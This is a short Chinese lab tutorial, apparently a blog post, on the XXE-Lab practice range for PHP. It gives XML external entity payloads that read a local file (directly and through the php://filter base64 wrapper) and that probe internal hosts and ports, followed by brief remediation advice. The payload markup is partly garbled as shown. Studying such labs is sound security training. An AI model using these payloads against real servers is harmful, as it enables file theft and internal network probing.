-
XXE-Lab for PHP
环境配置
1.将靶场进行下载....
https://github.com/c0ny1/xxe-lab2.将PHPStudy的中间件与版本信息调制为
php-5.4.45+Apache访问以下地址开始练习...http://127.0.0.1/xxelabs/php_xxe/
靶场实操
1.在登录界面输入账号密码并抓取数据包....
2.尝试读取本地文件....
- "1.0" encoding="utf-8"?>
- XL [
- fl SYSTEM "file:///d:/test.txt">]>
- <user><username>&fl;username><password>asdfpassword>user>
3.使用PHP伪协议读取文件....
- "1.0" encoding="utf-8"?>
- XL [
- fl SYSTEM "php://filter/read=convert.base64-encode/resource=d:/test.txt">]>
- <user><username>&fl;username><password>asdfpassword>user>
4.探测内网存活主机与端口...
- "1.0" encoding="utf-8"?>
- XL [
- fl SYSTEM "http://127.0.0.1:80">]>
- <user><username>&fl;username><password>asdfpassword>user>
漏洞修复
- 使用开发语言禁用外部实体;
- 过滤SYSTEM/PUBLIC等关键字;
- 升级 libxml 组件
-
相关阅读:
【项目】负载均衡OnlineJudge
想看懂源码必须会的位逻辑运算符
低成本、大容量、高交互…Polkadot 引领 GameFi 实现新突破
一个简单的HTML网页 故宫学生网页设计作品 dreamweaver作业静态HTML网页设计模板 旅游景点网页作业制作
Windows11 环境安装Gradle
Django(2)模板、标签
ShardingJdbc实战-分库分表
【MySQL从入门到精通】【高级篇】(十九)索引的分类&创建索引的三种方式&删除索引的两种方式
数据转换成json格式
架构道术-企业选择Dubbo作为分布式服务框架的10个理由
- 原文地址:https://blog.csdn.net/m0_66299232/article/details/132789109